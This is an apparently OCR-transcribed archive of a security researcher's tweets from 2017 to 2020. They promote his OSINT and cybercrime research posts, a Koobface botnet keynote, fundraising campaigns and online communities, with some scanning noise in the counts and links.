2017 


November 


29 - Wednesday 


02:17 
I’m back! #security #cybercrime #malware 


*1 
02:25 
Missing #Koobface? Watch my Keynote: Exposing Koobface - The World’s Largest 
Botnet at @CybercampEs 2016 - https://t.co/q5iTxLwmK1 


21 *%2 
03:15 


New Report - Assessing The Computer Network Operation (CNO) Capabilities of the 
Islamic Republic of #Iran - Report [pdf] - https://t.co/nl2A6DhGYV Related @memric]l
coverage - https://t.co/XepyZyMmGx 


30 - Thursday 


00:10 


@DanRaywood Hello. It’s a pleasure to reconnect again. Are you still keeping track of 
my research? Thanks. Dancho. 


December 


5 - Tuesday 


00:24 
@imaguid Hello. This has been fixed. Thanks. Dancho. 


00:27 


@DanRaywood Hello. I still maintain the operate https://t.co/vzz0lbZWGxX feel free to
follow my research including subscription to my RSS feed - https://t.co/weRtV8WDBd 
Thanks. Dancho 


*1 
00:28 


@RefundSearch @danchodanchev Hello. What do you have in mind? Let me know. 
Thanks. Dancho. 


00:29 
@parrotgeek1 @mikko Hello. This has been fixed. Thanks. Dancho. 
00:30 
@SMWonk Hello. You’re most welcome. Thanks. Dancho. 
00:32 


Did you enjoy my "Keynote: Exposing Koobface - The World’s Largest Botnet" 
presentation? Let me know. Thanks. Dancho. https://t.co/UCbDlytkgz 


*1 
00:37 

@braoru Thanks. Dancho. 
00:37 

@mrkoot Thanks. Dancho. 
00:38 


@BillionaireBay @danchodanchev Hello. What do you have in mind? Thanks. Dancho. 


01:02 


@MalwareTechBlog @Flavialicious @mikko @briankrebs Hello. Catch up with my post 
at - Dancho Danchev’s 2010 Disappearance - An Elaboration - 
https://t.co/oCW1d9hZTy 


01:03 


@ShanexX @ryanaraine Hello. Find out more about what really happened at - Dancho 
Danchev’s 2010 Disappearance - An Elaboration - https://t.co/oCW1d9hZTy 


01:03 
@linkbruttocane Thanks. Dancho. 


01:04 
@druvainc @BrianHonan Hello. Thanks. Dancho. 


01:05 
@abnev Hello. I will be resolving this shortly. Thanks. Dancho.


01:06 
@braoru Thanks. Dancho. 
01:06 
@BarryRGreene Thanks. Dancho. 
01:08 


@andris_soroka @danchodanchev Hello. Thanks for the consideration. I will be
definitely looking forward to participating in future events. Thanks. Dancho.
01:09
@CarolMatlack @danchodanchev Hello. Thanks for the consideration. I will be
definitely looking forward to participating in the future. Thanks. Dancho.
01:09
@pavanduggal @danchodanchev Hello. Thanks for the consideration. I will be
definitely looking forward to participating in future events. Thanks. Dancho.
01:10 
@DaveWandera @danchodanchev Hello. Thanks for the consideration. What is the 
project about? Let me know. Thanks. Dancho. 
01:11 


@ICACC2015 @danchodanchev Hello. Thanks for the consideration. I will be
definitely looking forward to participating in future events. Let me know. Thanks. 
Dancho. 


01:13 


@DougBockClark @danchodanchev Hello. Thanks for the consideration. I will be
definitely looking forward to participating in the future. Let me know. Thanks. 
Dancho. 


01:13 
@Jason_Healey @danchodanchev Hi, Jason. You’re welcome. Thanks. Dancho. 


01:15 


@jason_trost @danchodanchev Hello. Catch up with what really happened - Dancho 
Danchev’s 2010 Disappearance - An Elaboration - https://t.co/poCW1d9hZTy 


*1 
01:15 


@cyberwar @danchodanchev Hi, Richard. You’re welcome. Thanks. Dancho. 


01:16 


@GenjuShimada @danchodanchev Hello. Thanks for the consideration. I look
forward to participating in future events. Let me know. Thanks. Dancho. 


01:17 
@Thalesesecurity @helpnetsecurity @rik_ferguson @BrianHonan @danchodanchev 
@briankrebs Hello. Thanks. Dancho. 
01:18 


@maksumuto @danchodanchev Hello. Thanks a lot for the consideration. I will be
definitely looking forward to participating in the future. Let me know. Thanks. 
Dancho. 


01:19 


@atomicdarinka @danchodanchev Hello. Thanks a lot for the consideration. I will be
definitely looking forward to participating in the future. Let me know. Thanks.
Dancho.
01:29 
@stevewgold @danchodanchev Hi, Steve. Thanks. Dancho. 
01:30 
@knolinfos @danchodanchev Hello. Thanks. Dancho. 
01:33 


Guess who’s back? - https://t.co/vzz01bZWGxX - New Post - Dancho Danchev’s 2010 
Disappearance - An Elaboration - https://t.co/pCW1d9hZTy CC: @mikko @e_kaspersky 
@briankrebs @KimZetter @ryanaraine 

02:10 


Related #Koobface coverage on my "Keynote: Exposing Koobface - The World’s 
Largest Botnet" presentation. Courtesy of @CybercampEs. https://t.co/7KNTyD3t6H 


*2 
02:42 


Related #Koobface coverage on my "Keynote: Exposing Koobface - The World’s 
Largest Botnet" - https://t.co/TxdnjGDXZD [PPT] Watch the actual presentation here - 
https://t.co/UTo6t4uACd https://t.co/dfCN6Arl7K 




2018 


May 


23 - Wednesday 


05:03 


I wanted to let everyone know that I’ve recently resumed my research at
https://t.co/BQEsotlj1C and will be posting an updated set of research articles 
anytime soon. RT pls. #cybercrime #security #malware stay tuned! 


24 - Thursday 


02:33 


So the GCHQ has been following me on Twitter including active traffic monitoring - 
https://t.co/Hc5cq9ygg4 Take that. U.S "talking points" horses and animals. What’s 
next? RBN "knocking on my door" party? Depends on the nature of the research. 
Stay tuned! 


02:50 


Interested in participating in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program? Feel free to approach me 
including your contact details. CC: @Oxcharlie @alexsotirov @anonops 
@AnonymousIRC @anon_operations 


02:54 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @bradarkin @CeRTFi @daveaitel @dinodaizovi @diocyde 
@egyp/ 


02:57 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @GoVCeRT_NL @halvarflake @hdmoore @hernano 
@JaNeTCSiRT 


02:59 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @kevinmitnick @lennyzeltser @mdowd @mikko 
@msftsecresponse 

03:02 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @owasp @pusscat @Shadowserver @snowfl0w 
@taosecurity 

03:04 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @teamcymru @thegrugq @TheHackersNews @tinman2k 
@VuPeN @WTFuzz 


August 


3 - Friday 


09:01 


Dear, followers, I will be shortly resuming my activity on Twitter. Can you please
spread the word? #security #cybercrime #malware 


11 - Saturday 


04:57 


New Post - Historical OSINT - Summarizing 2 Years of @Webroot’s Threat Blog Posts 
Research - https://t.co/J4uzBESPOD #security #cybercrime #malware 


22 *%2 
05:06 


Related portfolio of Historical OSINT research - https://t.co/BG3CwNYOpq 
https://t.co/mYrbZQUBhW https://t.co/kzXWfapY02 https://t.co/9BFdKYdUrr 
https://t.co/dkr4mihCe6 https://t.co/g6QR8iMj4a https://t.co/LZCBYdn3lH 
05:08 


Yet another portfolio of Historical OSINT research - https://t.co/kW4o02yOJVO 
https://t.co/XryhcgneWD https://t.co/asVU5Ofy9Q https://t.co/hfgdlife2fN 
https://t.co/rjbhVZypS7 https://t.co/4Z5HVmuwDs https://t.co/nOdFm9T2G7 


05:21 


Remember the Russian Business Network and the New Media Malware Gang? Catch
up this historical OSINT analysis - "Historical OSINT - Inside the 2007-2009 Series of
Cyber Attacks Against Multiple International Embassies" - https://t.co/NBvVIitvTiu


06:08 
If you believe that you need to become a cybercriminal in order to catch a 
cybercriminal, you’re an OSINT/CYBERINT amateur. 

10:03 
The only way to work with someone you don’t like is by realizing the seriousness of 
the job you’re doing. #security #cybercrime #malware 
10:25 


Related portfolio of Historical OSINT research - https://t.co/my8AKfalgl 
https://t.co/uxX5C9gliqqa https://t.co/PsT4Am3J0Og https://t.co/niOUAbcG5D 
https://t.co/ncJoZdRbhi https://t.co/5PJjO8zvkH https://t.co/ZCsZg7nGpw 
11:31 


Related portfolio of Historical OSINT research - https://t.co/OMMCsbFoYW 
https://t.co/VmrPzwVYEI https://t.co/8Irnb8ulxF https://t.co/GPdleyykGj 
https://t.co/HeYx3u7bSN https://t.co/HOnlYcqwkKb https://t.co/PzC6SgwsLt 
https://t.co/sKUJ8hGJ41 
12:58 


The day you’re able to gather all this without interacting with the person in question, 
is the day when you can officially call yourself a pro. #security #cybercrime 
#malware 


October 


7 - Sunday 


13:59 


New Post - "Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two" - 
https://t.co/iiC6pI3CgY #security #cybercrime #malware 


8 - Monday 


04:40 


Interested in obtaining free access to Threat Data for research purposes? Approach 
me at disruptive.individuals@gmail.com My PGP key - https://t.co/iiC6plI3CgY 
#security #cybercrime #malware 


19 - Friday 


10:47 
I’m back! My RSS feed - https://t.co/d9aUCckSEQ #security #cybercrime #malware 




2019 


January 


15 - Tuesday 


08:35 


New Post - Who’s Behind BakaSoftware? - OSINT Analysis - https://t.co/jkSORQjIBY 
#security #cybercrime #malware 


*1 


16 - Wednesday 


02:03 


New Post - Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - 
OSINT Analysis - https://t.co/1xUuUc4tDe #security #cybercrime #malware CC: 
@FBIMostWanted 


<1 *l 
06:14 


New Post - Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An 
Analysis - https://t.co/cxzxGPd9N4 #security #malware #cybercrime 


*1 


24 - Thursday 


09:30 


New Post - The Threat Intelligence Market Segment - A Complete Mockery and IP 
Theft Compromise - An Open Letter to the U.S Intelligence Community - 
https://t.co/OVULL5sL6W #security #cybercrime #malware 


21 *%2 
09:48 


Did you miss me folks? Check out my latest OSINT analysis here - 
https://t.co/jkKSORQjIBY ; https://t.co/1xUuUc4tDe; https://t.co/cxzxGPd9N4 
#cybercrime #security #malware 


21 *3 


25 - Friday 


06:34 


Folks, I’ve just added a "Donate Today!" button at my https://t.co/wK6vExTcYa looking 
forward to receiving your generous feedback and possible donations. Stay tuned! 
#security #cybercrime #malware 


February 


2 - Saturday 


23:53 


I wanted to let you know that I’ve just launched the following campaign on
@Indiegogo - "Astalavista Security 2.0 - A Hacker in Every Home" - 
https://t.co/HkvtYmJAga looking forward to receiving your valuable feedback 
donations and questions. Thanks. Dancho. 


22 *%2 


3 - Sunday 


09:28 


RT @clubmasterfu: This is a nice campaign @dancho_danchev . I remember
https://t.co/EEMaEqOFPA . The COM tld was a generic search engine, b... 


23:21 
New Post - Official Astalavista 2.0 Campaign Announcement - 
https://t.co/HdMbv2xNad #security #cybercrime #malware 
*1 
4 - Monday 
00:40 


New Post - Official Astalavista 2.0 - Press Release Launch - https://t.co/uJOxCv3BH9 
#security #cybercrime @malware
03:42
New Update - Official Astalavista 2.0 - Statement of Work - https://t.co/EcNI4pUJV4
#security #cybercrime #malware 
07:23 


New Post - Official Astalavista 2.0 - The Big Idea - https://t.co/VClUe7gkt3 #security 
#cybercrime #malware 


*1 


5 - Tuesday 


01:59 


New Post - Official Astalavista 2.0 - The Fanciful Story - https://t.co/KIBjqBGHeC 
#security #cybercrime #malware CC: @anthonyaykut CC: @kevtownsend Stay 
tuned! Thanks. Dancho. 


21 %1 


8 - Friday 


09:26 
New Post - Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping 
Panel LLC" Scam Domain Portfolio Spotted in the Wild - https://t.co/uHrTpPANQQR 
#security #cybercrime #malware 
09:27 
New Post - Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment 
Scam Spotted in the Wild - https://t.co/qbxlse8sBB #security #cybercrime #malware 
09:29 


New Post - Historical OSINT - Able Express Courier Service Re-Shipping Mule 
Recruitment Scam Spotted in the Wild - https://t.co/7tOZsJHkfn #security 
#cybercrime #malware 
09:30 


New Post - Historical OSINT - Profiling a Typosquatted Facebook and Twitter 
Impersonating Fraudulent and Malicious Domains Portfolio - https://t.co/jgNz8tlsdT 
#security #cybercrime #malware 


09:32 


New Post - Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of 
OEM-Pirated Software - https://t.co/Op87RNL85s #security #cybercrime #malware
09:33


New Post - Historical OSINT - A Peek Inside The Georgia Government’s Web Site 
Compromise Malware Serving Campaign - 2010 - https://t.co/KV38selnN9 #security 
#cybercrime #malware 


22 *1 
09:34 


New Post - Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam 
Domains - https://t.co/eDPTK4Q3sN #security #cybercrime #malware 


21 


09:36 


New Post - Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary of 
The RAT - https://t.co/ic4tY2jJ6UE #security #cybercrime #malware 


21 
09:37 
New Post - Historical OSINT - "I Know Who DDoS-ed Georgia and
https://t.co/OPLSbzSK7Q Last Summer" - https://t.co/MmyjjTSKJX #security 
#cybercrime #malware 
21 
10:02 


The old farts VS Generation | cybercrime fighters warfare, is currently taking place 
everywhere. Let the true professionals win! #security #cybercrime #malware 


10:11 


The day LE starts chasing down legitimate researchers, is the day when LE officially 
has no clue where the real criminals are. #security #cybercrime #malware 


<1 *1 
10:16 


No cybercriminal starts from scratch in 2019. It takes a modest $500 investment to 
purchase 1k infected-hosts botnet. #security #cybercrime #malware 


12:26 


With or without branding and re-branding of threats, it’s cyber espionage and 
cybercrime "as usual". #security #cybercrime #malware 


12:27 


If rebranding of cyber espionage is necessary to boost R&D
motivation/productivity, that’s an entirely different problem by itself. #security 
#cybercrime #malware 




12:30 


The APT is only an element of something bigger. It’s called "unrestricted warfare" in 
combination with information warfare/cyberwarfare and beyond. #security 
#cybercrime #malware 


12:39 


With the buzz surrounding Russia’s understanding of cyber warfare everyone should 
avoid using the term disinformation and should stick to regular U.S based cyber 
warfare doctrine based principles. #security #cybercrime #malware 


12:54 


With the U.S government recently lowering down the "adversarial" cyber warfare 
entry barriers it should be noted that security researchers could also be labeled as a 
possible threat. Sample analysis - https://t.co/OVULL5sL6W #security #cybercrime 
#malware 


9 - Saturday 


04:15 


Remember GCHQ’s Lovely Horse/Two Face/Zool program whose purpose is to data 
mine and eavesdrop on key members of the Security Industry for OSINT? - 
https://t.co/Hc5cq9ygg4 Stay tuned for an upcoming assessment on the platform and 
how you can "perform" better. 


05:10 


Speaking of GCHQ’s Lovely Horse/Two Face/ZooL - https://t.co/PAONfNLfio did you 
know that back in 2010 @abuse_ch received a flood of fraudulent transactions for
drugs - https://t.co/AgMBC1ZBI1F including a Hitman request for me - 
https://t.co/HSNTdeztSR 


March 


22 - Friday 


10:47 


Announcing Offensive Warfare 2.0 - https://t.co/dSqJniBKue request an invite today! 
RT pls! #security #hacking #malware #cybercrime #botnet 


22 *%1 


April 


23 - Tuesday 


05:55 


New Post - Flashpoint Intel Official Web Site Serving Malware - An Analysis - 
https://t.co/K46AcPVxOH CC: @Flashpointintel 


24 - Wednesday 


10:14 


I’ve just updated the original - "Flashpoint Intel Official Web Site Serving Malware - An 
Analysis" post - https://t.co/xinChpPzdJ @Flashpointintel issued a response - 
https://t.co/loQyqdaO7K and @SCMagazine picked up the story - 
https://t.co/g6kH8AtowxX 


May 


11 - Saturday 


01:28 


Just came across this message courtesy of @HBGary - https://t.co/NCaSzKlanh seems 
like I made it to @wikileaks and let’s not forget the @Snowden archive -
https://t.co/UeaZOVuJkK Keeping it cool? Cheers to @Greghoglund for reaching out! 
Keep it coming! 


05:25 
Missing the editorial? Check out my newly launched - https://t.co/8KKLYQSBQB - 
Unit-123 - The World’s Leading Cyber Threat Intelligence Portal. Stay tuned! 
05:30 


New Post - https://t.co/UIVFqv6n5M - Welcome to Unit-123 - Official Launch 
Announcement - https://t.co/DSeqeidQHm #security #cybercrime #malware #botnet 
#cybersecurity #cybersec #CyberHunter #hacking #Hacker #Hackers 


05:32 


New Post - https://t.co/UIVFqv6n5M - France to Wage Offensive Cyber Warfare - Brace 
Yourselves! - https://t.co/BIHUyp6juN #security #cybercrime #malware #botnet 
#cybersecurity #cybersec #CyberHunter #hacking #Hacker #Hackers 


21 
05:39 
New Post - https://t.co/UIVFqv6n5M - UAE - Where Money Pays - Do You Want to be a
Cyber Warrior? - https://t.co/zCl7WNHBp8 - #security #cybercrime #malware
#botnet #cybersecurity #cybersec #CyberHunter #hacking #Hacker #Hackers
22


05:41 


New Post - https://t.co/UIVFqv6n5M - Oops, White House National Cyberspace 
Strategy Acknowledges Information Warfare Operations - https://t.co/A6dsIAtjVv - 
#security #cybercrime #malware #botnet #cybersecurity #cybersec #CyberHunter 
#hacking #Hacker #Hackers 


21*l 

05:43 
New Post - https://t.co/UIVFqv6n5M - Proactively Digging in the U.S Cyber Warfare 
Realm - And How You Can Perform Better? - https://t.co/NoWUIBq9jk - #security
#cybercrime #malware #botnet #cybersecurity #cybersec #CyberHunter #hacking
#Hacker #Hackers




05:46 


Did you know that I’ve recently launched an extremely popular Pro-Western 
invite-only Security and Hacking community - https://t.co/WIBGTU5ryT? Feel free to 
approach me and request an invite - to join the action today! #security #cybercrime 
#malware #hacking 

06:54 


New Post - Exposing Yet Another Currently Active Fraudulent and Malicious 
Pro-Hamas Online Infrastructure - https://t.co/ipNlgAWszr #security #cybercrime
#malware #botnet #terrorist #TerroristPropaganda #jihadist #Hamas 


21*1 
06:56 


New Post - Historical OSINT - Profiling the Loads[.]cc Enterprise - 
https://t.co/xu2OPf6xux #security #cybercrime #malware #botnet #DDoS 


06:58 


New Post - Historical OSINT - Massive Scareware Serving Campaign Spotted in the 
Wild - https://t.co/FUdR7ZwWES3 #security #cybercrime #malware #botnet 


07:00 


New Post - Historical OSINT - Yet Another Massive Scareware Serving Campaign 
Courtesy of the Koobface Gang - https://t.co/UtiOlFelBc #security #cybercrime 
#malware #botnet 


07:02 


New Post - Historical OSINT - Yet Another Massive Scareware-Serving Campaign 
Courtesy of the Koobface Gang - https://t.co/EHrCqxhOl1u - #security #cybercrime 
#malware #botnet


15 - Wednesday


00:24 

It’s official! Offensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber 
Security Community - Public Registration Now Open! - https://t.co/9PMxyz6Sb6 

Register Today - Like This Post - Comment - And Share it With Friends and Colleagues! 

05:51 


Offensive Warfare 2.0 - Official Launch! - https://t.co/9PMxyz6Sb6 RT pls! #security 
#cybercrime #malware #botnet #CyberSecurity #CyberThreat #Cyberthreats 
#informationsecurity #hacking #Hacker #hack 


July 


3 - Wednesday 


06:02 


This Friday! Offensive Warfare 2.0 Cyber Security and Hacking Community - 
https://t.co/WIBGTU5ryT YouTube Livestream Broadcast with me on the Introduction 
of the Project! RSVP today - https://t.co/ORpcVnYOUs RT pls! #security #cybercrime
#malware


08:01 


This Friday! - Live Two-Hour YouTube Livestream with me on the recently launched 
Offensive Warfare 2.0 Community - https://t.co/WIBGTU5ryT Bookmark the link now - 
https://t.co/mSiPxBYSbc RSVP today! - https://t.co/WA6PIK3AzT Stay tuned! 


4 - Thursday 


07:44 

This Friday! Two-Hour Offensive Warfare 2.0 - Cyber Security and Hacking Community
- https://t.co/obnlILUP27Yf Live YouTube Livestream Broadcast with me! Did you RSVP
already - https://t.co/ORpcVnYOUs #security #cybercrime #malware

5 - Friday 


07:11 


Live YouTube Broadcast - in 3 Hours! - https://t.co/YnruQLWLJu #security 
#cybercrime #malware 


30 - Tuesday 


05:03 


@MhmtVYY Hello - how can I be of any help? I can be reached at
dancho.danchev@hush.com Let me know. Thanks. Dancho.
05:06


New Post - Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis - 
https://t.co/t49cZdIngz #security #cybercrime #Malware 


05:07 


New Post - Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber 
and XMPP Accounts - https://t.co/ztAhszwvmd #security #cybercrime #malware 


*1 
05:09 


New Post - Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - 
An OSINT Analysis - https://t.co/ewBaYgusMN #security #cybercrime #malware 


05:10 


New Post - Profiling "Innovative Marketing" - The Flagship Malvertising and
Scareware Distributor - Circa 2008 - An OSINT Analysis - https://t.co/H7hY7kTEhl 
#security #cybercrime #malware 


07:32 
My RSS feed - https://t.co/weRtV8WDBd please subscribe today! RT pls! Stay tuned! 


August 


1 - Thursday 


03:02 


New Post - Who’s Behind the Syrian Electronic Army? - An OSINT Analysis - 
https://t.co/Cid61EZfCw #security #cybercrime #malware 


1 ¥e2 


21 - Wednesday 


01:14 
New Post - gOt Bitcoin? - https://t.co/TUaJNb9LCk #security #cybercrime #malware 


03:43 


Did you grab an account already? Offensive Warfare 2.0 - Cyber Security and Hacking 
Community! Register Today! - https://t.co/AVmthuWBNu 


22 - Thursday


08:44


Introducing Cybertronics - Virtual Reality for Hackers and Security Experts - Check out 
this Dark Web Onion and Donate Bitcoin Today - https://t.co/XgjY771xw0O 
https://t.co/O8nlolHWZQ 


Cybertronics 


23 - Friday 


01:41 


Just had my first Bitcoin donation for Cybertronics - Virtual Reality for Hackers and 
Security Experts. Check out this Dark Web Onion - https://t.co/XgjY77j8ny and donate 
today! Stay tuned! 


September 


6 - Friday 


17:23 


Missing Koobface? Check out this Infographic courtesy of @CybercampEs 2016 
where I used to held the Keynote presentation. Watch the video here -
https://t.co/UTo6t4uACd and check out the PPT here - https://t.co/oo5hjgR3qE 
https://t.co/x3tH4yvFOY 


*1 
EXPOSING KOOBFACE: THE WORLD'S LARGEST BOTNET
DANCHO DANCHEV


7 - Saturday 
04:53 


New Post - DDanchev is for Hire! - https://t.co/pjNZOjtWZC #security #cybercrime 
#malware https://t.co/36Yvq47U8i 


21 


14:58 


https://t.co/JTcqOaYgET https://t.co/q4CcTsu6kC 


22 


9 - Monday 


05:10 


If cybercrime is a form of economic terrorism - then the Dark Web is my home PC 
circa the 90’s with a degree of recognition for today’s modern adult porn content 
artists. #security #cybercrime #malware 


05:38 
New Post - Historical OSINT - The Russian Business Network Says "Hi" - 
https://t.co/NJFEtqqiYm #security #cybercrime #malware 
06:51


Anyone using Threema or SilentCircle? Can you please share your ID? Let me know. 
Thanks. Dancho. #security #cybercrime #malware 


08:12 


New Post - Join Me on Patreon Community! - https://t.co/lJeLHAhPwx #security 
#cybercrime #malware 


14 - Saturday 


23:28 


New Post - Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild - 
https://t.co/o8spXlyuZP #security #cybercrime #malware 


*1 
23:31 


New Post - Historical OSINT - Georgian Justice Department and Georgia Ministry of 
Defense Compromised Serving Malware Courtesy of the Kneber Botnet - 
https://t.co/BJecVfj4Yb #security #cybercrime #malware 


21 %1 


16 - Monday 


00:47 


Guess who’s running one of the World’s most popular Security blogs? It seems as 
you've been reading it all along - https://t.co/ela7lYefaZ Care to join the Team? 
Approach me at disruptive.individuals@gmail.com Stay tuned! 


October 


15 - Tuesday 


15:31 


Guess who used to run the show circa 2008-2013? It’s a pleasure and an honor to let 
you know that I’ve recently came across to @jeffreycarr’s TaiaGlobal PPT which lists 
me as a major Cyber Threat Intelligence competitor next to the DHS. Outstanding! 
https://t.co/TSQ7JthUNr

Competitors

Identified Competitors:

* (US)
* Cyber Security Research and Development Center (US)
* Cyveillance (US)
* Dancho Danchev (EU)
* Department of Homeland Security US-CERT (US)
* Ernst & Young (EU)
* EWA Information and Infrastructure Technologies, Inc. (US)
* Fortify (US)
* Global Security Mag (EU)
* iDefense Labs (US)
* Informatica (US)
* IT-Information Sharing and Analysis Center (US)
* iSIGHT Partners (US)
* Lookingglass (US)
* Multi-State Information Sharing Analysis Center (US)
* nCircle (US)
* SecureWorks (US)
* Trend Micro (US)
* United States Cyber Consequence Unit (US)


16 - Wednesday 


10:27 


Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join 
Me Today! - https://t.co/d3YC3PabV7 


19 - Saturday 


11:18 


Did you grab an account already? Offensive Warfare 2.0 - Cyber Security and Hacking 
Community - https://t.co/RHH1ws1pGO #security #cybercrime #malware 


20 - Sunday 


02:05 


Thanks to Jeff at @Treadstone71LLC for featuring an article regarding the Official 
Launch of Offensive Warfare 2.0 - Cyber Security and Hacking Community - 
https://t.co/sNK8CyLCpZ grab an account today and let’s get the conversation going! 

02:30 


Third day in a row - Law Enforcement and OSINT Intelligence Operation "Uncle
George" is currently taking progress! - https://t.co/d3YC3PabV7 Thanks to everyone
who approached me! Dare to participate? Drop me a line and let’s get down to work!
Cheers! 


02:33 


Big thanks to @packet_storm for featuring a News Article about the ongoing Law 
Enforcement and OSINT Intelligence Operation "Uncle George" - 
https://t.co/uteRbYH5mf Interested in obtaining a copy of the archive for enrichment 
and processing? Drop me a line! 

10:02 


I’m on Medium! My first post - "Assessing U.S Military Cyber Operational Capabilities 
to Counter Pro-ISIS Internet Infrastructure" - https://t.co/kuTdPOiU2d Can you please 
share the post? 


21 - Monday 


15:34 


New Post on Medium - "My Involvement in the Top Secret GCHQ “Lovely Horse” 
Program and the Existence of the Karma Police" - https://t.co/gZyu2eginO #security 
#cybercrime #malware 


22 - Tuesday 


06:25 


New Post on Medium - "Kaspersky’s Antivirus Products the NSA and U.S National 
Security - An Analysis" - https://t.co/Falizb2LHL #security #cybercrime #malware 


25 - Friday 


08:38 


Just launched a new set of upcoming posts on Medium! My fourth post - "Assessment 
of U.S Intelligence Community Cyber Surveillance Programs and Tradecraft — Part 
One" - https://t.co/PXHXXVysmh Join me on Medium and stay tuned! 


27 - Sunday 


06:13 


New Post on Medium! - "How the NSA utilized Iranian Cyber Proxies To Participate in 
the BOUNDLESS INFORMANT Program?" - https://t.co/o9EpVU6kzd #security 
#cybercrime #malware 


28 - Monday 


11:44 


New Post on Medium! - "Exposing GCHQ’s Top Secret “GORDIAN KNOT” Cyber 
Defense Sensor Program — An Analysis" - https://t.co/PBEmWe5EgU Check out the 
original "practical protection advice" research analysis - https://t.co/PXHXXVysmh


29 - Tuesday


06:51 


I just finished updating my Patreon Community Page including several other new Tiers
- https://t.co/jlaKUBZNwl Dare to join me Today! It would be a pleasure and an honor 
to offer the usual Security Research services to a direct set of supporters. Stay tuned! 


30 - Wednesday 


07:49 


New Post - "Cyber Security Project Investment Proposal - Astalavista Security Group - 
Official Re-Launch - Support me Today!" - https://t.co/FKihjCTbfL #security 
#cybercrime #malware 


November 


13 - Wednesday 


21:32 


Big News! I’ve joined forces with Armadillo Phone - https://t.co/oTMxAAZxLB for the 
purpose of continuing my research in nation-state and rogue and malicious actor 
tracking and profiling including the rise of mobile malware and the anticipation of
new cyber attack threats.


24 - Sunday 


14:50 


New Post - Exploring the Basics of Cyber Assets and Cyber Inventory Efforts Build-up 
- A Proposed Off-the-Shelf Methodology - https://t.co/yNkliddV6h #security 
#cybercrime #malware 

21 
14:55 


New Post on Medium - Exposing GCHQ’s URL-Shortening Service and Its Involvement 
in Iran’s 2009 Election Protests - https://t.co/eP3VMV3Cuh #security #cybercrime 
#malware 


21 *%2 


25 - Monday 


10:01 


New Post - Official World Hacker Global Domination Group (WHGDG) Dark Web Onion 
Launch! - https://t.co/DLWoMZdO4H #security #cybercrime #malware


December


15 - Sunday 


07:24 


My new day job! - https://t.co/8BKKLYQSBQB Help me land it permanently! Forward a 
Gift Card to a friend. Happy Holidays! Cheers. Dancho. #security #cybercrime 
#malware https://t.co/BcJJ5hHaxe 


Popular Tags: 
Hacker Group Cybercrime Forum Cybercrime Forum Community 
Cybercrime Community Cybercrime Forum Data Set 


Unit-123
Threat Intelligence Products Portal


16 - Monday 
08:30 
Happy Holidays! - https://t.co/OsoO5QIdH6 #security #cybercrime #malware 


21 %1 


20 - Friday 


09:46 


Anyone up for Christmas Discounts? https://t.co/8KKLYQSBQB #security #cybercrime 
#malware #osint #cyberattacks #hackers #Hacking #ThreatHunting #Threatintel 
https://t.co/DOaFKYrReH


09:49 


New post on Medium - Introduction to https://t.co/UIVFqv6n5M — The Primary 
Destination Spot for Intelligence Deliverables - https://t.co/yZ1IDfYCO2 #security 
#cybercrime #malware 


*1 


21 - Saturday 


09:08 
New Post on Medium - Is a Virtual Reality Social Network for Hackers and Security 
Experts Ever Possible? — An Analysis - https://t.co/8wvBATaNrC #security 
#cybercrime #malware 
11:29 


New Post on Medium - "FBI Most Wanted Cybercriminals — OSINT Checklist — An 
Analysis" - https://t.co/cQJOUWMXcQ #security #cybercrime #malware 


*3 


22 - Sunday 


07:10 


New Post on Medium - "https://t.co/Xest1SInvx — The Scene the Way We Know it — 
My Experience in Running the Portal" - https://t.co/15SJ5KRtFf #security #cybercrime 
#malware 


*1


23 - Monday


05:44 


New Post on Medium - "Exposing the U.S Intelligence Community and GCHQ’s Use of
“Dirty Tricks” Online — An Analysis" - https://t.co/A7YSn6R8Fh #security #cybercrime
#malware
11:20 
Happy Holidays! Keep up the good fight and keep the spirit! - 
https://t.co/DOXwqk25wy #security #cybercrime #malware 
27 - Friday 
06:54 


New Post - "Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - 
An OSINT Analysis" - https://t.co/GRKPb3cAiv #security #cybercrime #malware 


30 - Monday 


10:06 


New Post on Medium - "How the GCHQ Used the Top Secret “ANTICRISIS GIRL”
Program to Spy on Users — An Analysis" - https://t.co/unAJFm4d3x #security 
#cybercrime #malware 


<7 *4 
10:07 


New Post on Medium - "The 2016 U.S Presidential Elections and Russia’s Active 
Measures in Terms of Cyber Espionage" - https://t.co/rZi2XqL9nf #security 
#cybercrime #malware 


*1 




2020 


January 


1 - Wednesday 


07:42 
Joining Team Armadillo Phone! - https://t.co/I[ANoR7mgs] #security #cybercrime 
#malware 
*1 
07:43 


The Armadillo Phone - A Security Review - https://t.co/iaozFue4VO #security 
#cybercrime #malware 


*1 


8 - Wednesday 


09:46 


Believe it or not - I’ve joined forces with https://t.co/X2z28aSWfB - the actual owner 
of the infamous https://t.co/BTuSMsPDol search engine - https://t.co/EwhbEvzy2e New 
Blog here: https://t.co/2P1coLkWd8 Keep it coming! 


*1 
09:48 
New Post on https://t.co/X2z28aSWFfB - "A Brief Introduction to the New 
https://t.co/X2z28aSWfB Project - or Who’s Dancho Danchev?" - 
https://t.co/uWOO10Xi0K #security #cybercrime #malware 
09:48 


